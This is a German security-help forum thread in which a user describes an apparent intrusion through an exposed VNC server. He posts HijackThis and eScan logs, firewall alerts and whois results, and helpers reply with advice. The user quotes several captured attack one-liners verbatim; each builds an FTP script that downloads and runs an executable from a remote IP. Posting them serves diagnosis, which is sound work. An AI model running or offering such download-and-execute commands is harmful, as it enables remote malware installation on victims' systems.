|
Log-Analyse und Auswertung: während VNC-Session führt Win-Ausführen-Dialog autom. Commandos ausWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
10.11.2007, 13:09 | #1 |
| während VNC-Session führt Win-Ausführen-Dialog autom. Commandos aus Hi Leute, vorab meine Story, die übrigens die merkwürdigste ist, die ich je an meinem System beobachtete. Ich wohne in Hamburg und mein Kumpel in Berlin brauchte Hilfe an seinem Rechner. Da mir Skype-Sessions, ohne seinen Desktop zu sehen, viel zu anstrengend sind, wollte ich mit ihm zusammen VNC installieren. Dabei stellte sich heraus, dass er genau wie ich hinter nem Router sitzt, folglich die Ports (5900 VNC-Client + 5800 für Browser(Java)-basierten Zugriff) zu forwarden sind. Das klappte letztlich bei mir, bei ihm leider nicht, da komischerweise Menupunkte in seinem Router nicht aktivierbar waren. Aber das ist eine andere Geschichte. Ich war mittlerweile heiß auf VNC geworden und richtete mir wieder einen DynDNS-Account ein, um auch von unterwegs (ich bin werktags in Köln) bei Bedarf via VNC an meinen Rechner zu kommen. Ich testete, ob mein Router die IP ordnungsgemäß weiterleitete, indem ich versuchte webbasiert auf meinen Rechner zu kommen. Das funktionierte dann auch gut. Den VNC-Server lies ich mit aktivem Passwort und der Einstellung, dass bei ner Verbindung das Hintergrundbild nicht mit übertragen wird, an. Dann ging ich per Ausführen-Dialog (Windows+R) per regedit in meine Registry, wo ich einen Wert überprüfen wollte, der eigentlich den AV-Notifier in Vergangenheit zuverlässig blockte, aber seit neuestem eben nicht mehr. Der Wert stimmte, so schloss ich zumindest RegEdit. Der Ausführen-Dialog war vermutlich noch offen. Dann startete ich MobileMaster (was ich erst kürzlich zuverlässig [via IR] zum Laufen brachte), um mein Handy mit meinem System zu synchronisieren. Dann dachte ich mir, lieber zuvor mal den Dateimanager von Nokia PCSuite zu checken und schloss den MobileMaster direkt wieder. Und jetzt kommts: Nun ging mein Hintergrundbild weg, wurde grau. Mein Blick ging direkt aufs SysTray, wo gerade mein VNC-Tray von weiß auf schwarz wechselte. Das bedeutet normalerweise, dass sich jmd darauf eingelogged hat. Als wenn dies aufgrund des Passwortes nicht schon unmöglich genug ist, ging mein Blick nach unten links, wo sich gerade im Ausführen-Dialog wilde ewig lange Kommandos (sowas wie @echo, exit, blablabla) wie von Geisterhand eintrugen. Ich schaltete aus Panik direkt meinen Rechner aus, da mir dies gewaltig suspekt vorkam. Danach fiel mir ein, dass ich in meinem Browser noch nen Tab offen gehabt haben könnte, welcher versucht haben könnte auf <meinAcc>.dyndns.org:5800 zuzugreifen. Ich hatte ja zuvor (siehe oben) mehrmals versucht, das IP-Forwarding meines Routers an meinen DynDNS-Account zu testen. Da könnte eben noch ein Tab offen gewesen sein, der zuvor keine Verbindung zustande bringen konnte. Wie auch immer: Ich testete, wann das VNC-Tray-Icon schwarz wird. Dies geschieht erst nachdem man mit dem Passwort Zugriff erhält. Ein simples <meinAcc>.dyndns.org:5800 [Enter] reicht also nicht, so dass meine Vermutung mit dem Tab eigentlich flach fällt. Wie ihr jedoch merkt, poste ich hier die gesamte Story, da ich mir überhaupt nicht mehr sicher bin. Leider hatte ich keine weitere Zeit, mich darum zu kümmern, da ich (siehe oben) werktags in Köln arbeite und am Wochenende in Hamburg bin, wo auch mein Rechner steht. Am darauf folgenden Wochenende war ich dann im Westerwald bei meinen Ellis, um den Bday meiner Sister zu feiern. Meine Freundin (in Hamburg) brauchte jedoch dringend Nachhilfe in Mathe. Ich dachte mir, dass wir die Nachhilfe, wenn wir sie schon auf diese Distanz machen müssen, doch via VNC wunderbar mit Excel, Notepad und dem Formeleditor von Word zusammen an meinem Hamburger Rechner machen können. Gesagt getan, ich connectete und alles funktionierte recht gut. Während dieser VNC-Session passierte jedoch immer wieder Folgendes: Der Ausführen-Dialog (Windows + R) öffnete sich selbständig und schrieb: - Beim ersten Mal: cmd /c echo OPEN 78.54.0.181 31839>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit - Beim zweiten Mal: cmd /c echo OPEN 78.54.182.212 15531>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit - Beim dritten Mal: cmd /c echo open 85.179.104.152 3609 >> i &echo user anfwen anfwen >> i &echo get msoft60412.exe >> i &echo quit >> i &ftp -nv -s:i &msoft60412.exe &exit - Beim vierten Mal: cmd /c echo open 85.179.104.152 3609 >> i &echo user ktfqfp ktfqfp >> i &echo get msoft32313.exe >> i &echo quit >> i &ftp -nv -s:i &msoft32313.exe &exit Beim jedem Mal ging die Commando-Shell mit connect <ip> auf. Daraufhin meldete sich meine Firewall mit etwas in der Art des Folgenden (jedoch immer war ftp.exe darin enthalten): Programm zur dateiübertr (ftp.exe) versucht eine verb herzust. [85.179.104.152] nutzt den remote-port 3609. möchten sie diesem programm den zugriff auf das netzwerk erlauben ? Dateiversion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Dateibeschreibung : Programm zur Dateiübertragung (ftp.exe) Dateipfad : C:\WINDOWS\system32\ftp.exe Prozess-ID : DCC (Heximal) 3532 (Dezimal) Verbindungsursprung : lokal initiert Protokoll : TCP Lokale Adresse : 192.168.0.78 Lokaler Port : 2396 Remote-Name : Remote-Adresse : 85.179.104.152 Remote-Port : 3609 Ethernet-Paket-Details: Ethernet II (Packet Length: 76) Destination: 00-17-9a-59-3d-e3 Source: 00-e0-7d-8f-10-15 Type: IP (0x0800) Internet Protocol Version: 4 Header Length: 20 bytes Flags: .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset:0 Time to live: 128 Protocol: 0x6 (TCP - Transmission Control Protocol) Header checksum: 0xecd1 (Correct) Source: 192.168.0.78 Destination: 85.179.104.152 Transmission Control Protocol (TCP) Source port: 2396 Destination port: 3609 Sequence number: 2008314393 Acknowledgment number: 0 Header length: 28 Flags: 0... .... = Congestion Window Reduce (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..1. = Syn: Set .... ...0 = Fin: Not set Checksum: 0x9b02 (Correct) Data (0 Bytes) Binäres Abbild des Pakets: 0000: 00 17 9A 59 3D E3 00 E0 : 7D 8F 10 15 08 00 45 00 | ...Y=...}.....E. 0010: 00 30 A9 99 40 00 80 06 : D1 EC C0 A8 00 4E 55 B3 | .0..@........NU. 0020: 68 98 09 5C 0E 19 77 B4 : 72 19 00 00 00 00 70 02 | h..\..w.r.....p. 0030: FF FF 02 9B 00 00 02 04 : 05 B4 01 01 04 02 00 0C | ................ 0040: 00 15 FF FF FF 11 00 3F : 3F 3F 3F 3F | .......????? Diesen Dialog lies ich einfach stehen und dann ging die Windows-Commando-Shell irgendwann automatisch wieder zu. Meine Firewall hat hoffentlich Schlimmeres vermeiden können. Mein System: - WinXP 2002 SP2 + further patches - AMD XP+ 3200 Barton - 1 GB RAM - Sygate Firewall 5.5 build 2364 - AntiVir (ständig up to date) - SpyWareGuard - TrojanCheck Guard mit aktivierter Prozeßüberwachung (Autostart lasse ich von anderem Tool ständig überwachen) - SpyBot-SD Resident TeaTimer zur Autostart-Überwachung (im Zweifel gehe ich immer auf "nicht erlauben") - Browser Firefox neueste Version - Email Thunderbird neueste Version So jetzt seid ihr daran, mir bitte zu sagen, was hier los ist. Ich mache mich schon mal daran einen HJT-Log zu erzeugen, um ihn hier im Anschluß zu posten. Vielen Dank schonmal |
10.11.2007, 17:06 | #2 |
| während VNC-Session führt Win-Ausführen-Dialog autom. Commandos aus **************************************************************
__________________************************************************************** E S C A N - L O G HINWEIS: DARUNTER KOMMT DANN DER H J T - L O G ************************************************************** ************************************************************** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Header ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ find.bat Version 2007.06.16.01 Microsoft Windows XP [Version 5.1.2600] Bootmodus: NETWORK eScan Version: 9.5.4 Sprache: English C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\MWAV.LOG ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Infektionsmeldungen ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ System found infected with ezula Spyware/Adware (ebay.url)! Action taken: No Action Taken. System found infected with purityscan Spyware/Adware (min.html)! Action taken: No Action Taken. System found infected with bonzibuddy Spyware/Adware (spchapi.exe)! Action taken: No Action Taken. System found infected with bonzibuddy Spyware/Adware (spchapi.exe)! Action taken: No Action Taken. System found infected with ezula Spyware/Adware (ebay.url)! Action taken: No Action Taken. System found infected with purityscan Spyware/Adware (min.html)! Action taken: No Action Taken. System found infected with bonzibuddy Spyware/Adware (spchapi.exe)! Action taken: No Action Taken. System found infected with bonzibuddy Spyware/Adware (spchapi.exe)! Action taken: No Action Taken. System found infected with bemonitor Spyware/Adware (C:\WINDOWS\tmp)! Action taken: No Action Taken. Object "gain.gator Spyware/Adware" found in File System! Action Taken: No Action Taken. Object "gain.gator Spyware/Adware" found in File System! Action Taken: No Action Taken. Object "gain.gator Spyware/Adware" found in File System! Action Taken: No Action Taken. ~~~~~~~~~~~ Dateien ~~~~~~~~~~~ ~~~~ Infected files ~~~~~~~~~~~ File C:\System Volume Information\_restore{4EA59174-DB49-4A96-B24A-3C9F60E268D3}\RP281\A0023606.exe infected by "NULL.Corrupted" Virus! Action Taken: No Action Taken. ~~~~~~~~~~~ ~~~~ Tagged files ~~~~~~~~~~~ File C:\Programme\RealVNC\VNC4\WinVNC4.exe tagged as "not-a-virus:RemoteAdmin.Win32.WinVNC.4110". No Action Taken. File C:\Programme\RealVNC\VNC4\winvnc4.exe tagged as "not-a-virus:RemoteAdmin.Win32.WinVNC.4110". No Action Taken. File C:\Programme\RealVNC\VNC4\wm_hooks.dll tagged as "not-a-virus:RemoteAdmin.Win32.WinVNC.4". No Action Taken. File D:\My_Files\daten laptop\myFilesHannover\installExe\vnc-4_1_1-x86_win32.exe//file1 tagged as "not-a-virus:RemoteAdmin.Win32.WinVNC.4". No Action Taken. ~~~~~~~~~~~ ~~~~ Offending files ~~~~~~~~~~~ Offending file found: D:\My_Files\system\datenbanken\favoriten\links\ebay.url Offending file found: D:\My_Files\system\install_exe\progs\stuff\page macromedia etc\self_php\funktionsreferenz\mathematische_funktionen\min.html Offending file found: D:\My_Files\system\install_exe\progs\stuff\personaltranslator pt2001 officeplus 'deutsch'\speech\english\spchapi.exe Offending file found: D:\My_Files\system\install_exe\progs\stuff\personaltranslator pt2001 officeplus 'deutsch'\speech\german\spchapi.exe Offending file found: D:\My_Files\system\datenbanken\favoriten\links\ebay.url Offending file found: D:\My_Files\system\install_exe\progs\stuff\page macromedia etc\self_php\funktionsreferenz\mathematische_funktionen\min.html Offending file found: D:\My_Files\system\install_exe\progs\stuff\personaltranslator pt2001 officeplus 'deutsch'\speech\english\spchapi.exe Offending file found: D:\My_Files\system\install_exe\progs\stuff\personaltranslator pt2001 officeplus 'deutsch'\speech\german\spchapi.exe Offending file found: C:\WINDOWS\tmp ~~~~~~~~~~~ Ordner ~~~~~~~~~~~ ~~~~~~~~~~~ Registry ~~~~~~~~~~~ Offending Key found: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\gator.com !!! Offending Key found: HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\p3p\history\gator.com !!! Offending Key found: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\p3p\history\gator.com !!! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Diverses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~ Prozesse und Module ~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~ Scanfehler ~~~~~~~~~~~~~~~~~~~~~~ C:\Programme\Nero\Nero 7\Nero Mobile\SetupNeroMobileSigned.exe not Scanned. Possibly password protected... C:\Programme\Nero\Nero 7\Nero Mobile\SetupNeroMobileUnsigned.exe not Scanned. Possibly password protected... D:\My_Files\Downloads\gamersday-highqual.zip not Scanned. Possibly password protected... ~~~~~~~~~~~~~~~~~~~~~~ Hosts-Datei ~~~~~~~~~~~~~~~~~~~~~~ DataBasePath: %SystemRoot%\System32\drivers\etc C:\WINDOWS\System32\drivers\etc\hosts : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Statistiken: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan-Optionen ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Memory Check: Enabled Registry Check: Enabled System Folder Check: Enabled System Area Check: Disabled Services Check: Enabled Drive Check: Disabled All Drive Check :Enabled All Drive Check :Enabled Batchstart: 16:24:14,89 Batchende: 16:24:24,78 ************************************************************** ************************************************************** H J T - L O G ************************************************************** ************************************************************** Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 17:19:52, on 10.11.2007 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\Programme\Sygate\SPF\smc.exe C:\WINDOWS\system32\spoolsv.exe C:\Programme\AntiVir PersonalEdition Classic\sched.exe C:\Programme\AntiVir PersonalEdition Classic\avguard.exe C:\Programme\Microsoft LifeCam\MSCamSvc.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\MsPMSPSv.exe C:\Programme\Raxco\PerfectDisk\PDSched.exe C:\WINDOWS\system32\devldr32.exe C:\Programme\Trojancheck 6\tcguard.exe C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe C:\WINDOWS\system32\RUNDLL32.EXE C:\Programme\Creative\MediaSource\Detector\CTDetect.exe C:\PROGRA~1\ALLTOTRAY\ALLTOTRAY.EXE C:\Programme\Spybot - Search & Destroy\TeaTimer.exe C:\Programme\CoolMenu\CoolMenu.exe C:\Programme\SpywareGuard\sgmain.exe C:\Programme\SpywareGuard\sgbhp.exe C:\WINDOWS\System32\svchost.exe C:\PROGRA~1\MOZILL~1\FIREFOX.EXE C:\WINDOWS\explorer.exe C:\Programme\HiJackThis\HijackThis.exe O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll O2 - BHO: SpywareGuard Download Protection - {4A368E80-174F-4872-96B5-0B27DDD11DB2} - C:\Programme\SpywareGuard\dlprotect.dll O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll O4 - HKLM\..\Run: [Trojancheck 6 Guard] C:\Programme\Trojancheck 6\tcguard.exe O4 - HKLM\..\Run: [avgnt] "C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe" /min O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit O4 - HKCU\..\Run: [Creative Detector] C:\Programme\Creative\MediaSource\Detector\CTDetect.exe /R O4 - HKCU\..\Run: [AllToTray] C:\PROGRA~1\ALLTOT~1\ALLTOT~1.EXE O4 - HKCU\..\Run: [WindowBlinds] C:\Programme\Stardock\Object Desktop\WindowBlinds\WBInstall32.exe O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Programme\Spybot - Search & Destroy\TeaTimer.exe O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'LOKALER DIENST') O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM') O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user') O4 - S-1-5-18 Startup: DSL-Manager.lnk = C:\Programme\DSL-Manager\DslMgr.exe (User 'SYSTEM') O4 - .DEFAULT Startup: DSL-Manager.lnk = C:\Programme\DSL-Manager\DslMgr.exe (User 'Default user') O4 - Startup: CoolMenu.lnk = C:\Programme\CoolMenu\CoolMenu.exe O4 - Startup: SpywareGuard.lnk = C:\Programme\SpywareGuard\sgmain.exe O8 - Extra context menu item: &WordWeb... - res://C:\WINDOWS\system32\wweb32.dll/lookup.html O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL O17 - HKLM\System\CCS\Services\Tcpip\..\{096E916E-FF93-4405-A2A8-41C14C3C0A9F}: NameServer = 192.168.0.1 O17 - HKLM\System\CS1\Services\Tcpip\..\{096E916E-FF93-4405-A2A8-41C14C3C0A9F}: NameServer = 192.168.0.1 O17 - HKLM\System\CS3\Services\Tcpip\..\{096E916E-FF93-4405-A2A8-41C14C3C0A9F}: NameServer = 192.168.0.1 O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL O23 - Service: AntiVir PersonalEdition Classic Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\AntiVir PersonalEdition Classic\sched.exe O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Programme\AntiVir PersonalEdition Classic\avguard.exe O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\11\Intel 32\IDriverT.exe O23 - Service: PDEngine - Raxco Software, Inc. - C:\Programme\Raxco\PerfectDisk\PDEngine.exe O23 - Service: PDScheduler (PDSched) - Raxco Software, Inc. - C:\Programme\Raxco\PerfectDisk\PDSched.exe O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Programme\Sygate\SPF\smc.exe O23 - Service: DSL-Manager (TDslMgrService) - T-Systems Enterprise Services GmbH - C:\Programme\DSL-Manager\DslMgrSvc.exe O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Programme\RealVNC\VNC4\WinVNC4.exe -- End of file - 5278 bytes ************************************************************** ************************************************************** MEINE BEMERKUNGEN ************************************************************** ************************************************************** 1. Was sollte ich wegen des eScan-Logs unternehmen ? 2. Ist mein HJT-Log in Ordnung ? Mache mir atm recht große Sorgen wegen Keyloggern. B I T T E NUR ANTWORTEN, WENN IHR EUCH ZIEMLICH SICHER SEID, DAS PROBLEM ZU KENNEN. Bin leider nur am Wochenende an meinem Rechner, daher also nur begrenzt Zeit meinen Rechner zu warten. Außerdem möchte meine Freundin am WE auch noch was von mir haben. Wenn ich dann wegen "es könnte evtl" auf die Suche gehe, ist es mir die Zeit einfach nicht wert. Also bitte net bös sein, wegen der Bemerkung. Ich hoffe, dass ihr mich versteht. Vielen Dank Geändert von taz (10.11.2007 um 17:43 Uhr) |
10.11.2007, 19:26 | #3 | |||
/// Winkelfunktion /// TB-Süch-Tiger™ | während VNC-Session führt Win-Ausführen-Dialog autom. Commandos aus Hallo.
__________________Zitat:
Wie stark ist denn das VNC-Passwort? Also Länge und Zeichensatz wäre interessant zu wissen. Fast bombensicher bekommst du VNC, wenn du ihn noch mittels SSH tunnelst => HowTo für sicheres VNC mittels SSH Zitat:
Zitat:
Wenn du den Verdacht auf Keyloggern hast, solltest du scheunigst sämtliche Passwörter ändern. Nat. alles von einem garantiert sauberen Rechner aus.
__________________ |
10.11.2007, 20:19 | #4 | ||||||
| während VNC-Session führt Win-Ausführen-Dialog autom. Commandos ausZitat:
Zitat:
Zitat:
Zitat:
Ich stelle mir eher Zweiteres vor, wo dann das Programm bei Erfolg (Eindringen durch VNC-Lücke u/o Port) versucht von nem Server im Web ne Datei zu laden, um sie anschließend auf dem System auszuführen und schadhaften Code zu platzieren. Wenn ich da richtig liege, dann hat halt nen Proggie versucht, etwas zu laden, aber konnte den DL aufgrund meiner FW gar nicht starten. Ergo, wenn ich mein VNC sicherer mache, dann brauche ich mir keine Sorgen mehr machen, oder ? Kannst du denn was mit den 4 Kommandos anfangen ? Alles was ich daraus lese, ist, dass eine Datei geholt werden sollte. Den Rest verstehe ich nicht. Zitat:
Gehen wir davon aus, dass du Recht hast und jemand auf meinem Rechner war und etwas ändern konnte. Wie soll ich denn herausfinden, wo er etwas geändert hat, um sein krankes Hirn zu befriedigen ? Wenn da ein Prozeß und/oder Dienst laufen würde, welchen ihr nicht kennt, dann würdet ihr dies doch an den Logs sehen, oder ? Bist du dir 100%ig sicher, dass beiden Logs nichts Verdächtiges zu entnehmen ist ? Zitat:
Wie auch immer, nehmen wir an, ich ändere die PWörter auf nem sauberen Rechner. Wenn ich tatsächlich von nem Keylogger befallen bin, dann hat er doch spätestens beim nächsten Login über meinen Rechner das neue PW wieder. Ich möchte sicherstellen, dass ich keinen Keylogger habe, wie soll ich dies bewerkstelligen, wenn man in meinen Logs nichts sehen kann ? Hast du da Tipps auf Lager ? Vielen Dank bisher schonmal Geändert von taz (10.11.2007 um 20:58 Uhr) |
10.11.2007, 21:47 | #5 | ||||||||||||
/// Winkelfunktion /// TB-Süch-Tiger™ | während VNC-Session führt Win-Ausführen-Dialog autom. Commandos ausZitat:
Zitat:
Zitat:
Zitat:
Zitat:
Zitat:
Zitat:
Der wollte auf jeden Fall bestimmte Dateien herunterladen und hat versucht, weitere ftp-befehle auszuführen. Sehr wahrscheinlich mit dem Ziel, die heruntergeladenen exe-Dateien auf deiner Kiste ausführen zu lassen. Zitat:
Zitat:
Zitat:
Zitat:
Zitat:
__________________ Logfiles bitte immer in CODE-Tags posten |
11.11.2007, 22:17 | #6 | ||||
| während VNC-Session führt Win-Ausführen-Dialog autom. Commandos aus Ich habe seit kurzem 2 weitere Probleme. Der Datei-Explorer schmiert (auch im Leerlauf) ständig ab (Keine Rückmeldung), so dass ich ihn immer mit dem Task Manager zwingen muß, sich zu schließen. Jeder weiss, was dann immer passiert. Der Desktop ist kurz weg und die explorer.exe startet neu. Das andere ist, dass meine Freundin mir heute erzählte, dass sie sich letzte Woche mehrfach nicht in ihren GMX-, Ebay- und ….-Account einloggen konnte, obwohl sie das richtige PW verwendete. Erst wenn sie das PW in einen Editor eingegeben und in die Zwischenablage geholt hatte, um dann mit STRG-V das PW einzugeben, konnte sie sich einloggen !!!??? Ich habe mir heute mal ein wenig Zeit genommen und ein paar Dinge gecheckt. - VNC-Log (siehe weiter unten): konnte ich nicht finden - FW-Log: In den Einstellungen fand ich, dass Log-files nur maximal …. kb groß sein dürfen. Dies reicht jedoch gerade für 2 Tage. Der Vorfall während der Nachhilfe war jedoch bereits am 04/11/07. - Suche nach den Dateien, die herunterzuladen versucht wurden. Ich durchsuchte all meine Platten mit der Datei-Explorer-Suche und mit der TuneUp Undelete Suche. Die Letztere begibt sich auf die Suche nach bereits gelöschten Dateien. - mit Registry Finder von jv16 PowerTools die kpl Reg durchsucht - jede Suche wurde sowohl nach kpl Dateinamen (ohne Erweiterung) als auch nach gewissen Fragmenten ihrer Namen (unter Verwendung von Wildcards, versteht sich) durchgeführt - kein Ergebnis Erklärt mich jetzt nicht für verrückt, aber ich habe dem Script 2mal erneut Zugriff erteilt, indem ich den VNC-Server wieder habe laufen lassen, um so ein FW-Log zu erzeugen. Zunächst hatte ich die Einstellung prompt local user to accept connection aktiv, mit der nichts passierte. Erst nachdem ich diese Einstellung deaktivierte und ein paar Minuten wartete, kam wieder jemand auf meinen Rechner. Dann schrieb sich wieder Folgendes in mein Ausführen-Dialog: cmd /c echo OPEN 78.54.224.154 23330>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit bzw. Beim zweiten Mal cmd /c echo open 78.54.38.155 1445 >> i &echo user gnttac gnttac >> i &echo get msoft56684.exe >> i &echo quit >> i &ftp -nv -s:i &msoft56684.exe &exit Dann ging die ftp-shell auf: OPEN 78.54.224.154 (bzw. 78.54.38.155) Währenddessen versuchte ich verzweifelt die Client-IP herauszubekommen. Aber genau wie die Log-Funktion scheint auch diese Funktionalität den Käufern von RealVNC vorbehalten zu sein. Ich habe jedoch nur die Free Edition. Meine Firewall jedoch hatte nun ein Log, den ich in der nächsten Antwort angehangen habe. Die Excel-Datei konnte ich nicht hochladen, deshalb sieht die Word-Version ein wenig blöd aus. Habe die Liste etwas aufbereitet, einerseits zur Anonymisierung und andererseits damit man dort besser durchsieht. Wenn sich diese Datei mal jemand anschauen würde, wäre ich sehr dankbar. Bei Bedarf kann ich auch die Excel Datei zusenden. Auch führte ich beim 2. Mal ein backtrace (whois) durch, um evtl auf diesem Wege noch mehr zu erfahren. Diese beiden IPs finden sich auch in meinem FW-Log. ************************************************* Detailinformation von [78.54.38.155]: % This is the RIPE Whois query server #2. % The objects are in RPSL format. % % Rights restricted by copyright. % See Whois Database Copyright % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag % Information related to '78.53.192.0 - 78.54.159.255' inetnum: 78.53.192.0 - 78.54.159.255 netname: HANSENET-ADSL descr: HanseNet Telekommunikation GmbH descr: ALICE DSL country: DE admin-c: HNT-RIPE tech-c: HANO-RIPE status: ASSIGNED PA mnt-by: HANSENET-MNT mnt-lower: HANSENET-NOC mnt-routes: HANSENET-MNT source: RIPE # Filtered role: HanseNet IP Coordination address: HanseNet Telekommunikation GmbH address: Ueberseering 33 A address: D-22297 Hamburg address: Germany phone: +49 40 23726 0 fax-no: +49 40 23726 193996 abuse-mailbox: abuse@hansenet.com admin-c: DM3738-RIPE tech-c: HANO-RIPE nic-hdl: HNT-RIPE mnt-by: HANSENET-MNT source: RIPE # Filtered role: HanseNet Network Operators address: HanseNet Telekommunikation GmbH address: Ueberseering 33a address: D-22297 Hamburg abuse-mailbox: abuse@hansenet.com admin-c: DM3738-RIPE tech-c: TG819-RIPE # Thomas Graumann tech-c: EULE-RIPE # Marco Eulenfeld tech-c: SA1375-RIPE # Svend Andersen tech-c: ASZ-RIPE # Andreas Schwarz tech-c: OLBA-RIPE # Olaf Baumert nic-hdl: HANO-RIPE mnt-by: HANSENET-NOC source: RIPE # Filtered % Information related to '78.48.0.0/13AS13184' route: 78.48.0.0/13 descr: HANSENET origin: AS13184 mnt-by: HANSENET-MNT source: RIPE # Filtered ************************************************* Detailinformation von [85.179.104.152]: % This is the RIPE Whois query server #1. % The objects are in RPSL format. % % Rights restricted by copyright. % See Whois Database Copyright % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag. % Information related to '85.176.0.0 - 85.182.127.255' inetnum: 85.176.0.0 - 85.182.127.255 netname: HANSENET-ADSL descr: ALICE DSL descr: HanseNet Telekommunikation GmbH descr: ADSL Pool Customers country: DE admin-c: HNT-RIPE tech-c: HANO-RIPE status: ASSIGNED PA mnt-by: HANSENET-MNT mnt-lower: HANSENET-NOC mnt-routes: HANSENET-MNT source: RIPE # Filtered role: HanseNet IP Coordination address: HanseNet Telekommunikation GmbH address: Ueberseering 33 A address: D-22297 Hamburg address: Germany phone: +49 40 23726 0 fax-no: +49 40 23726 193996 abuse-mailbox: abuse@hansenet.com admin-c: DM3738-RIPE tech-c: HANO-RIPE nic-hdl: HNT-RIPE mnt-by: HANSENET-MNT source: RIPE # Filtered role: HanseNet Network Operators address: HanseNet Telekommunikation GmbH address: Ueberseering 33a address: D-22297 Hamburg abuse-mailbox: abuse@hansenet.com admin-c: DM3738-RIPE tech-c: TG819-RIPE # Thomas Graumann tech-c: EULE-RIPE # Marco Eulenfeld tech-c: SA1375-RIPE # Svend Andersen tech-c: ASZ-RIPE # Andreas Schwarz tech-c: OLBA-RIPE # Olaf Baumert nic-hdl: HANO-RIPE mnt-by: HANSENET-NOC source: RIPE # Filtered % Information related to '85.176.0.0/13AS13184' route: 85.176.0.0/13 descr: HANSENET origin: AS13184 mnt-by: 